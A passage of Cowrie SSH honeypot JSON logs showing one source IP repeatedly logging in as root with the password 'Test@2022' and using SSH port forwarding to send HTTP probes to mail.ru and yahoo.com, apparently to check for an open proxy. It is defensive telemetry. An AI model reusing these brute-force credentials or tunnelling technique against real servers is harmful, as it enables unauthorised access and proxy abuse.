ha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.708793Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.960044Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24012,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24012","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.011627Z","session":"9d2c377abfab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.062071Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":28979,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28979","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.204783Z","session":"9d2c377abfab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.255217Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":21607,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21607","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.396589Z","session":"9d2c377abfab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.447245Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.498636Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8557,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab5091c09d2e","protocol":"ssh","message":"New connection: 77.83.207.83:8557 (1.2.3.4:22) [session: ab5091c09d2e]","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.546987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.557389Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.596791Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.844353Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23258,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23258","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.894750Z","session":"ab5091c09d2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:18.944457Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.login.failed","username":"uucp","password":"1234567","message":"login attempt [uucp/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.041391Z","src_ip":"212.227.235.229","session":"e0e035e0619b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":8246,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8246","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.083817Z","session":"ab5091c09d2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.133424Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20117,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20117","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.276062Z","session":"ab5091c09d2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.326025Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.376676Z","src_ip":"77.83.207.83","session":"ab5091c09d2e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8646,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd5d82b21d62","protocol":"ssh","message":"New connection: 77.83.207.83:8646 (1.2.3.4:22) [session: fd5d82b21d62]","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.428614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.429376Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.482099Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.744385Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15292,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15292","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.798583Z","session":"fd5d82b21d62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.851274Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":15639,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15639","sensor":"my-vps","timestamp":"2025-08-31T03:49:19.999407Z","session":"fd5d82b21d62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.052263Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20598,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20598","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.199058Z","session":"fd5d82b21d62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.251845Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.305137Z","src_ip":"77.83.207.83","session":"fd5d82b21d62"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8742,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc5d4ee70e97","protocol":"ssh","message":"New connection: 77.83.207.83:8742 (1.2.3.4:22) [session: cc5d4ee70e97]","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.354901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.355968Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.406355Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.658015Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64016,"dst_ip":"1.2.3.4","dst_port":22,"session":"279e53c22f68","protocol":"ssh","message":"New connection: 217.72.205.35:64016 (1.2.3.4:22) [session: 279e53c22f68]","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.696329Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.697969Z","src_ip":"217.72.205.35","session":"279e53c22f68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26595,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26595","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.709550Z","session":"cc5d4ee70e97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.760265Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.792661Z","src_ip":"212.227.235.229","session":"e0e035e0619b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":22798,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22798","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.904992Z","session":"cc5d4ee70e97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:20.955639Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":13593,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:13593","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.096971Z","session":"cc5d4ee70e97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.147810Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.199462Z","src_ip":"77.83.207.83","session":"cc5d4ee70e97"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8830,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1ede0621fb9","protocol":"ssh","message":"New connection: 77.83.207.83:8830 (1.2.3.4:22) [session: d1ede0621fb9]","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.249342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.250456Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.301176Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.554019Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13265,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13265","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.605856Z","session":"d1ede0621fb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.657042Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":30096,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30096","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.801145Z","session":"d1ede0621fb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.851988Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":14691,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14691","sensor":"my-vps","timestamp":"2025-08-31T03:49:21.997120Z","session":"d1ede0621fb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.047970Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.100368Z","src_ip":"77.83.207.83","session":"d1ede0621fb9"}
